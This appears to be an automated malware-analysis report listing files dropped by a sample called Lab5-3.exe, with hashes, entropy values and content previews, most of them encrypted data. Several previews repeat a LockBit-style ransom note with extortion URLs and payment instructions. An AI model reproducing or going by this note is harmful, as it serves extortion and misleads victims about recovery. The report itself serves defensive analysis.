                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5776
                                                                                                          Entropy (8bit):7.96702500474656
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:3Ed6Yg4z0EDYe9zztE7z0l9JfdK4rwu7hr6a7Gx0uKeY2ElUJ:386RLEDYedjl1Zrwyg0Cb
                                                                                                          MD5:CEDB66C080358BFBF425A616618B0607
                                                                                                          SHA1:CED9F637935AEB7BE2475735C0E2D194521FCB83
                                                                                                          SHA-256:2B4E15AC58933DA9BD3C80313FFB3B48177796B0C0656918AA8DC1A098DA6E02
                                                                                                          SHA-512:7CE9A5F90EAD0C3AF69578DC27CAC7829128BE0E0ADAEB685A619B36890EE1D769E914731A8DF5F1A34D5408AB1F45245FDFEB42103DBDC26DEC139A8C175A00
                                                                                                          Malicious:false
                                                                                                          Preview:.E`.."k..t...*.#..^....U`.h.Lt!w.PY.W..%c...9.4.....v..K.J.M......`..T...d.<.....`.h.|X...~.....la...n.3...Q-..q.......x..j<...S7....}*Y.N0QZ.`.....^~.h}...9...i...Q.U.wS.lN*.F...9.h.....t......|M.,Wj.w.?..0..7.Ej...O9..4.......Pzw.!..A.P.{..2.....'..8.........g+2C.B....G7...N.....4P.7.....a..G.Uz 0K..i........o...i........}.WLm...Q...Jv+.<(...P...,.c_....)..Kan....#..&.|.\.4.....*h[.......2k]:.x'...F.Z..i..5..;.y..3]^.E.(.@-.{..FD<0..+/..i..q%...&Ut.|y.-3..O.....`&...pGa.].I..m._..gh..J...0/.{..3.....SG..7...>3.....\..m/.}P@=..QoM..?L....._.~.....?,n.......,Y....p..n.0...^:.a4......@]H..5..)Ec....e..........I...$.G.$O.Y..7..=8.?>.b..'_......:.i.}.4..4J.&.....-".A.8..{d....f.E..'y..+...M...2...]K0.~i.p8o.o'.ad.$.x.l...R...TC.....v..v....lbB..t(.....r..Gt.G. V....-....3?..}.L..[...........8.......+3..y....D..[9s..;@..jO.V.:I....7n.s...Gx.c....C? 3 ...'.=..'.J.......=..d..b....E.....ux5..t.I.E.@(C.........c...t......r.T.%.a.=...Y.v$..p
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):64400
                                                                                                          Entropy (8bit):7.996966838307066
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:NLwILMLabUPkmUnJixdjQTnX1j06OH6P8D7A5ysrZoZ:NLwILMLa4PknJYQTnylDmr6Z
                                                                                                          MD5:E3E08BC725CC53BF924251C34EAEDA49
                                                                                                          SHA1:FE1AC92E75C57330BAF1A6E6F8DF356E507265C4
                                                                                                          SHA-256:591B1229F046E41F7B8CD2E143E9B6C63D353D9B14368E2AB8169BB585B64CAA
                                                                                                          SHA-512:139341750776CB580FC33C6046C6FE18503D299EB788C480D0DF5D082A14392F051A6BF7D26B27D8AC0BDB6A6CD39DEE976743D10DCC5BBC3BB6504FC1C97D1D
                                                                                                          Malicious:true
                                                                                                          Preview:....,?..cW(Wv.?...N.[.9...~O.=..)?.."J.>.r......3........Z.....M..|.Q]Q"h....K ....8@9.m...H.EM.5.t..K.d.....ep.L..6>.`D/C.52........S..L....d..p.!.K.........."...R.*....1tv5g.i(F...t..Q.................'..A..LS.....hCb"r....E.8.M..{...dl.0..?.v....K..bpx;#..OkK.....*-..<..(".......l............ZW.K...b{........%.H.....)..K]$..CG.o.....I....)u..N..0\..~,m..9...vl.z.7Q..w...7.ZDJ.8)& &f9A......O62..u~;O+Y.r?.A.0:..J2..5L.Nf.^.q..v..p7.......7...l....V....S......F...6i.=...V0^.y.\$..c@.2InE"o.d]....y.a...z.........{.......{NH5."..oCdO..Z..z{..<.>...8.I.+.F.'|.M....q.^p.....~.N...|o. '.w.o..L...:'.-.,..8.-....'U.@.~...H.M....J....l.Th.....;.E.&.j..O.v..G#.a..{..!*...r...T...Iz.e....e..H....d$.K....V.........t.......lb}).a\@sps..I.>..q.\..T...t(/k.....7,..._Wu.<....`C.&.....k...4.[.^M.....*..6.o.."..Kd...$4d.V?F4.Z.").r0..tY..M...uj..Eg..V......-F......H.....`..........."....u.4p...)n.5P2#.NA\....N.~z.D){.n40.2.-.88...~.o..Y....`SJy..o.v.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3040
                                                                                                          Entropy (8bit):7.942576297145134
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:y9mSp+2fMgo2gv0LjqLgEUIVHfUTid3hBaUoSGFcmeykEdEElU92i:umSp+TF2uEEHuGx0uKeY2ElUJ
                                                                                                          MD5:F21F667A17BB4D0AFAF18E655EF0DD7B
                                                                                                          SHA1:8A26985F7D2402670836DC152C32BE9592A81448
                                                                                                          SHA-256:4869947A79CF5DC9A7FCC6BCFD6F1D7BF49E563D94BE0CFB5C8029A103556002
                                                                                                          SHA-512:6A5AA127D29471482E738EFA61C125499CFE3B7F80CB0ED2437A054A017D86D8FA6090A3674263D3FA6D01861D6CEF56245DADF776FA70ACA911F6C9E6BEA0EF
                                                                                                          Malicious:false
                                                                                                          Preview:.e..`C.k..+f..@....H.....bQ1G..T./-lR..t)AL8.i(.<^.t...T.2....:.a.X8.:0....p8,...S1.h..-AP...1l..T.X.......C.<k..4....S.W....aN~0z:.n.,%...{6._.G...."(m...Xmb(....$..f..Ie6...U.:..V0.. .B<e9.X&.M..#.*`.Q;7...SQ...'...g>....}...0..|..... "..d...3'...d..S@lsC.v.4O.Bu.3....9..3; lu.z.i...u]).|.....K!.XUHB.Zc...u....O\..z..s.%..'...<...@.,.."..F,.q9bz%..j..0I.w2S(...n....%..ND($.f......:..7!EO...,.....R...<....]L.f....q....2...V..7.=.b.@R.Mm6..A.r.'....?...OC.....s$B..Bj.....-?a..x3.y...m...<4.G.7.....u0.bp.....o...n.)..p$.._.(......9$m4XC$...'.....ye.....M=3S@X)..(...x...\...'.g#.<...G.....fh.4v....y.9.n"..p.^D..h..............?...+..,.I....b.7.|.{..2..*.ad.L...J.4J.......(.|.?.....b. .z..C1..0k_.....w8.h..;.'......JK......?..t.cz..V.r\kl=........|Y\.......m..V.p..i ....{.c)i.x.....F...Z.."6.......N.#cE.gP......*.#]."...BC..&......".....8.x[...3...8.'..6...X.....mS>r3...w55P...+.......;..;..9.%..N.....e.......N....0..Y......?
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):43600
                                                                                                          Entropy (8bit):7.995661161749747
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:FO1PtJ4NTz9aYixSWych9GoZ+6GuqQTzQ7ajrYBN9Ot2qaJL3TGDQNKk2gFZ:FO1PtJyTzhjWyKkoc5Qr3YBzOt2vPuoT
                                                                                                          MD5:297CD230C433AF8CB1EB9EA27BAFE030
                                                                                                          SHA1:7DC2E0B574B2FAC2173510C6A406ECD9B2DFBFFE
                                                                                                          SHA-256:A14A069AFCFB0E27773F68293030E70CFC35BF3AD58779AA80C74CFC9F7A6AEB
                                                                                                          SHA-512:C38A6F82FE052F8F4D6BA99DFBC41624278FC15D91E494F96DBC4490AACE08DC862B8FAC0D1C7CE6E590042B432257E2584D2E84423C31C2DA5C553A23734BF2
                                                                                                          Malicious:true
                                                                                                          Preview:....#..j!/LW_./..~<......:.e.SC&...a.=|.j;C.y......)...w....'......._h.P..y......./@.X....kq....4K..q6..6.R.......Zr.Dp.V].W..`....G....W.+;.m.a.$........>OR.k~.l.}.P....)z.\...2.*...l.afn...._....M..q..!-..../+e.o.g....~Z.He.......0.. .....b.v..u6>W".]...U..x...9.z....C...mo....+.Vo.)1......%..G.......(.^........!d.....Q.,T.....; .k...=H3..E3E.....q^........W..! .Z...^.4/=...Zx..Vs...=.D,.......C....>....WNS....!..L.`o.04..R..=9.....-..H...]....1Y.....d.U.{4./......t.z...p.l.\.e.E...j8..w.....%=...&.`#.....Q..:=c..{..=..e.X.L >....B....0...:..d!?.v..._/n...8..p..*.y...c!..}.u.2I.&....7....y.....A/....../..`.$..?.Z.o.2.Mk.....y.5.1X.\u../(&..1...0.8..P.k....z.p@..6|a.<..Z....Ad.6.............&..,..L.5fq...ePl.x...R.$..w..........M.c..K.HdL.?.?.......k.c.ZC..bkWE.'l^1b.....}J.....z9.y.F....c..-..d./"wl...T...v>'Si%&dm.;.PD...C..O.|.C..O..B...N.h..s..`.cr.Gf.,..+.4.....`].Ek...e.W..|..(v7.....x.v...N...`h}.g`S.....%..:..p:.$..Y.$i...W~...:4.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2368
                                                                                                          Entropy (8bit):7.926225925841511
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uaXowVd2xDKn92mC17BthHfUTid3hBaUoSGFcmeykEdEElU92i:uaS+0mC1PiGx0uKeY2ElUJ
                                                                                                          MD5:E6774F69641F1DDF20C988033BE6489A
                                                                                                          SHA1:6B6349517FEE06A874F971BDEFC99D9C5DB3F872
                                                                                                          SHA-256:9799225FBC6C0AC985743387063BA50DD5622344C38406F36F24F8C14C061FA2
                                                                                                          SHA-512:B0EC5A6794FA736292D8B4E44C4F14FA56E4A3D3970A44FE4D3CB572254A9575204077750A560F56A06236368D6C07AABC37F25EA8B7F8591FD4F8D8F6E686DD
                                                                                                          Malicious:false
                                                                                                          Preview:.p.J.....:.!Z.l!_...bA.P...$c...v&u.'...O....2..0;.T.'.n..=..7...p..[%...<.fKh...)C..}%..0.w.lM..|-.Av...j..I74.e1M.`..C.......1-h.V2.....9.2dC9x.....xk3......Y..@?..`...H..*..=..6S.*3....2#5.'=V....u.S(.8..a]vt.C......."..lm)/...........).2xz?hH..0.U....;A37x......A.*.q..C".4^..n.3.W........iK.A.J...E.Vq.+=...&..|.MRW.K..w"M..Do.Kgd.g.j...`e.$.9=.$|.g....z...18M./......U.\......v.*.r&`D.. .TAU'Q....K.6j.,......[..4.=F..FH...$.Q..Xw....A...~H...3.Oi.}...aO.n..i..M....M.9A.I]6..3.W..N.k...w.X;Kp.j".....r.......)U.b14.Ys.$q..-...".C)..U.....].h U..lBN.....:-..{...wb...1i]...A.c.....b.oo^....\....j,7$.N...7..[....$.&..[...@.].Q....~/....?=#.{,.LO.i.r...E-O.Ln=w..vUc.x*..1#..h.>h...A7.s}?...r.h.....B...6..t........1..K...~e.X.,A:.......d.W..A..K.....N.=T....5...}swS.a..(~!..G..l......h._.H).....p..a....V.........(L..py."..8{\.msB..ev./=[\.2Z4+...V....$....}.7.H.\..s.o.....MkO.3G.<~.6.K.K.....x^..j.N.)V.lo.B.m...u....r.Q-I
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9760
                                                                                                          Entropy (8bit):7.9786356920877735
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:RD2RNzHNb6tepKg1wVr5xJuaFwzFgq7a67NJfvu1SVtnso0Cb:RiRttJtmrXJjw5/dnu1SRtb
                                                                                                          MD5:6515A173D3ED5EF76753EABD2CA8C265
                                                                                                          SHA1:80F4871E82C96617CDCDC7DAA1C065BD0295AB81
                                                                                                          SHA-256:4EB83F29AC57F72A0AFC3564E7C2EFF1FE19E715784A8062346F06B95EA9E7BC
                                                                                                          SHA-512:79A739EAD7013BCA2BB2A050C6A8BC7653518884F27D46E00FBA94291778972A75A576B54D702199E6FE469884A14D05A3EE2EC78E0BC0ADD7C4520B9E2CA594
                                                                                                          Malicious:false
                                                                                                          Preview:6g..`..\.q.V.....vcd..>...,p....}d~...6..%..H......%...d..7.z=q7....&.oQ.6.F.q...[..[..J.:_..PAp.=....Ezm,.V!.v...G....LP......N{.....U...3iL...<.....b.....i..2&.....?.gI..Nu|....p.C.$W..pmT..o.24...........viFb2.....|]...=i.._.j.....F.E.B.....#.....W......8...{.t.t.5.....<...2wd.n.....;P~.W..:-...Kj..i....V...Mj.;..k.K.....o~."..W..%.......*<....$.#.)..*.[JL8...CPH<.....D%mv...]p.iE.['.._..e@.f.D-....CW.cv=.e......y2.5..>.X..^w`L.0.:j1.jb..H~.`.>v....c......0X.;..Zy4?...MZt.E.;6/.in.#..p. "....k..h....;..L..87.M..V..{.;.Yr..?....p.0.@].?. .4.4...w!x5kN^)......p.v..y..W....:.Li..).8`.n.l.....U.@..tM kWF.VX.I`..Y....)...VG.9....'.....!...c.u..S...H.'...=_8V.n_(..V.*9..k{W..h.6`pP.c.C.o..J..#...c.6..9.z...{.+.Y..w.khHt:.A.I.N5...{.s......*......)m-...p8....-(.....r..1T....;..Pxu....^......5.b.f.]...?.zn..S0g..5.3...n..5VP...A.`E......:T@.....=....@h.W..bezb..5q>8_.BK...Dc"N....j%;..DsNR(.I....v.....)D.+.).a......0........u5.x.4.y.Y2K.l.$.G.+M.G.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1744
                                                                                                          Entropy (8bit):7.896104894013182
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:LyXhlGQ54U2hHfUTid3hBaUoSGFcmeykEdEElU92i:LyxEQD2iGx0uKeY2ElUJ
                                                                                                          MD5:D931C9430E3BB50003FC4ECE92B2A045
                                                                                                          SHA1:8D72A996FED1713DA55CF4DD3A9EC4A70BC22F56
                                                                                                          SHA-256:56D96244D7DCE486067ACE4149A59631F4BE553321CE1F175CD8C219A8562027
                                                                                                          SHA-512:D78A878C5C90953F51197C92F475460B96FF50FE77ECF4D9645635F780390CBEA52282CC3791068B7D7BF9C7BD45D20BC7CBB52C86A1EE59546325888091A89E
                                                                                                          Malicious:false
                                                                                                          Preview:.C.z.?.....J..'!.....5.P...&9.-^.....Ee.#D..}.@..q..%_...=7..0^.......:t.F.....v.dO..B.Ew..:..^...Z4.=p..,...]..g.w*<........H..&.h.....C.:.....sc..]..j....:.._9...nv.,....+v.....[.3)..+.4x...@..Er.u...&....e.,nt.n.C...n...o........n]...a.s5g...<..L.....O0r2b.E^.%.....]..]i.>..4.9dw.S..\......J.I....V.9.E..#.P.t....l1Ck.IM..H.V.&]..L.3xKj{&y.r!.....eD .3........XrD...4....&.!..T.c...T.Ud...'N....B6.0..i..73?.TX.VX.7*^..../L..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2256
                                                                                                          Entropy (8bit):7.918033360859269
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:WH0UlHFrtn4MbBfuY1dzPE46HfUTid3hBaUoSGFcmeykEdEElU92i:sltD4M5H1dz84VGx0uKeY2ElUJ
                                                                                                          MD5:E8AF3FB0DC93C2E830A58EDF59767D63
                                                                                                          SHA1:DC7F038A33F7D3F95E2043E057AA6FCD9EF7EC7B
                                                                                                          SHA-256:0603995F640572F878D1B83C17CA466BBA269E463298ABC91FDCAB87CF698525
                                                                                                          SHA-512:D0D840BA70688B207E29506F534C80A51B3DC9B6134B8AA95B6628F42BBD2379D8DD3FC80164AB7A4105D3978CA51EA938016583255AE59E98670BEC26F91D4C
                                                                                                          Malicious:false
                                                                                                          Preview:+<.Cl....7.I.....1&.K......w...5X./$E..s2:.c..a..t.....%...Y{.....x6.+...6M..n...-.+......cbN..al....ce{M|?....1..O.uk.&.P....4...*U4.........EW..&g.S.%....2;....0...#siDUG-...NM/{...GV.}.}!"$B6.S...."....^.F..-.~O.d.-...K..tI.......w.^.J.N]...dx.L..4..K.W.J..j.N.=....T...'6......% ..../.=L .}......^R...(...QS..s......g$.....g..r/.\.lE>..:.3s.....#....u.1..x.!.v....u.[..s.+.....8.g..E..*.#.G.!..G....S..y.8.3...&...N..?......7q.:>rOe..~...+6.o....I...L].k.D...x......W.f;.;M4....z0....R...BI$.....@.Og0...=(.iE...@.4.|......).....u-..E..6.2@i0...F.v...r.Y.ZPVa.......t.[.-.wr.7B$..t-e=....5..v.jh...........M..I..}..H...16.......8...~.<c A..P..rO..F.....7.h.f.2@Z3.V..wH...'..._}...0;|.\....+....R.....@._...Z.....!MOk.(Y..Jc..G..p.}.B$..<}....+...^.....Z..5|..#ze... .........`G.y.Z...C.(..b....}....8o...w..^J!Z:.....T.......m0H..3fV .YJ.W....oi....N.jk.'..-V...M.R.E.-!Q..o..aBk."....q....Z#.._.@....h.v.I..K...^.Q...rp....;....M....R...=(..(ch
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9616
                                                                                                          Entropy (8bit):7.980962323006323
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:EvepmlxoEzsINkC0xno3HHmtP/JhCD92rM1NDZDEKKfl0srT30Cb:EveuGEAINkCGnsHUXCD92rqZ4KKGsrTp
                                                                                                          MD5:402D624383B4D112FFA7FF546A9FB4DD
                                                                                                          SHA1:35199138DA24C98F7EFC2536733B9C955F05E56A
                                                                                                          SHA-256:7741EABF543311D884D3FDEF9941BD4A08BF1B692EBB6619823C478E7FD939B6
                                                                                                          SHA-512:77B9114FCE4CD6BB5C432BAD8B54E7F04FCDC9CFCE57DD534F89B0B1E7D1E6B7A2A7C39917567E091394992138C4C3A5B884C62B534DE1E3047DF68BDFC5E5D0
                                                                                                          Malicious:false
                                                                                                          Preview:.:......E..+.-N.....G..3k..c.....jJ..d.0...,7..h_C...]..?../{...8.y.&..].].1&'hV...I....|...6...M.<..#.,...._.e.P...L.HA]*.*.R.........`.74(j.i.._....O..f.4b.....dV..d.Q...S.2....-.l.x:../.P.Vx..O-..............R5.t.v......i{.i:..V7......^Q.~*T...K...^..7\..........X....F_j.....#._F......0..O..gl.q..`1.^....l4<.:R..9u.S...^u.E.{&S.....).%Tq..tD.........n... =.f.2..w..$-....:........Z.L.uX.).%I#i>.fj{..R........AB......v..1R.T{....u...t..%;...j?...`~.\....F.....T.:.=....q.(.LM:.....h..._R....o...N.X..TJ.`s.k..#A.....h..G.i=..CW1=.v.......V=..&O<..b.'F6..)......kikV.r..W....\..<... S;S.3a..$|..VU...nM.@.F..Vd. ....T'".....g5..M5.......=fCZ@...h!..e..CH.}..T.......,H..z.q6g....Z....R@.W.v.`#....QL%.+.Mj..Gv..H...E..........fU...he8.e..,..".....I.A7@cM3....&.=.sm...7.ja..+.gJ8u..x...w....{av'.._. .+.:._.y.L)..Jr..@....i..].Ee.G...Z..By..l.V_.....8..$.0.P...ud.......W.....(..[FA{...`..]..e.....H....*.W,'v+.).l..%.SJ.*.Y>..).s.i.T. 1.6g.z.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:DOS executable (COM)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9712
                                                                                                          Entropy (8bit):7.979127068819142
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:3tO9GJ4FSh6/7SkkZFrdU4qGEloLkAME5jaqWt53gc1aUIzHBXc0Cb:3tO9k4FG6/+dF5U4dElNE5jaqW7Qc0UL
                                                                                                          MD5:E3EC87CFBA3E693F902695D13F1D218B
                                                                                                          SHA1:66A8DAE29A1CEB624336CF9228F94EB6DB918C99
                                                                                                          SHA-256:056F4566C7BF3861E94C57046EAF149C0077E8A99EF2E413ED240D4C5D8429A6
                                                                                                          SHA-512:5416865245269731599B197942F7FC0CC834EB442B024195FF6304DBF8BEC5141E4988AF4485C6C06353DC32B92658864C7F69A34F9AC898578A62692EDC032F
                                                                                                          Malicious:false
                                                                                                          Preview:.Y....{....R.iy2$.Ra.h..x..4....uZ.L.j.h....f....._.........dh.u.K..[s....u...1..a.-%=..-/..p.p.._X...x*./.../b.k......s1h....nD*Q.7..~+0......W~..{X..[J...0.i6o}....4&.m\.}....T~.Pa.D...,._=....gvW.."...%.#".I4..,..:.]...=..e..a.........../...`..K....`.d.....~.,....>.y.S?t.~...={...Z...9Dm.n....;`.......Sq...<............%.bT.c....e]...&.`.ZU.7.4.g./..SB...].F.G..m."....t.^...\5 .6T../.W......+.B%.l..P....g.j0...G.UF...E..EqS..Am..@...\?......u....1....v.].+:vl.t..........1..6.[..]G.s.J..B..|...K%q^".....Uqp.....9....r3.z.......v.}j.......C.<.BI........#.<..[.ksi...I(....+ .t.`|.JWt.I......i.^.c.m..LG.W:....c...;bx./b,..4di...6..R.];.}).f.F+....R.E....CT..~Y..Z..sU.6......$..z#...7.[...v.b...x.N+.c#.].[.G....9.t......-....\..;..D......jv;..g...D......,..H.....&..J.|..3Q..H.-.D.9(..w.cm&.........h9.O..[....0.cC.. V'...KChl.0..2A.U;P...g.o.H.*...Q/...79..)B.B..(..1j.!.....k..7.{O!.$B..w....r...h..%.x......e..+.q...Z.......4..[B.c....2m..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17024
                                                                                                          Entropy (8bit):7.988785337873724
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:sEYLksZUhgWE/WOm1fkx++6m3jpOcTTPkRN2/W77tb:sEYLkaUKWETgmzpOA2N2/6Z
                                                                                                          MD5:CFB5C67CC692FC885576B47CD9BE3ACA
                                                                                                          SHA1:A8DD6DAB5A14747A689CCC0649112E54D85B97E2
                                                                                                          SHA-256:646C691019BA140FD0365FCF8AF24205BDF4219C356164AD0D7CA20EC5F2614E
                                                                                                          SHA-512:1AE02FB7AE9A2BE2EFCF3E09629129CAB0919A4313F27FD1784117AFB042C47602BA5FD89A4350800FB09BF1B8E39B65F5F3BEFBD44D110016010B39F12F764D
                                                                                                          Malicious:false
                                                                                                          Preview:X..l...H...H.>.D...O..u.Y..t.FL.....=.......S|p..&.........5..x.UX.........#VVG...tM..6.T..`...5q.Vh(.W...J...N.......JX.....Y...1/[.=Y{......9..t...P......3..1.O.....8.h...4.V{.0...=.R...4....4[...4|@@=,.#Ks/...c..p./.jz.s}.b.g.Bis..X.......X...~H.A..~...H.)....=2....._...X.{W.+V-...p.)...'.;..G7H.....!l.....[......*.,..y.m...L.;.NM.....-...ek...F.{.[....Zo.wC....4c...C.......#.D)i.......Z.U.'..G..a...B...WS.sx..L.3...0/...........{.VF."....'.../..+.X.Q......".=. ..S...Ki4.W.x.Y..Y....=;..c..t~Z...>...#0...=.k./.............K..L...&...8.{.gm.._...*.+....>W...L..d....Sn._.RQ.l.....d.G(..6...n..9[]..,W.......tCk.[&..H..\.\$k..`Dc....(.......A....))f...W.-.8.{.........4.....X.U.f.zT'4..:].s..(..rxV&u..2.3.#....7,.#X..2b.Yt..]5{..1.>Z.Us.;\.c5eB..P...%..e/..bUa.>.RC[.,R....J.Z.....7J..].K...4K...P.S.<K.P..+..{n.ayn,.......=...j.s].....B.+..t.u.().2..."R..^3J....:../...x.wG.F..<o...A..G..jE...k..<6.q.(..../g.w..{..3F...>~.L...jm&..Q
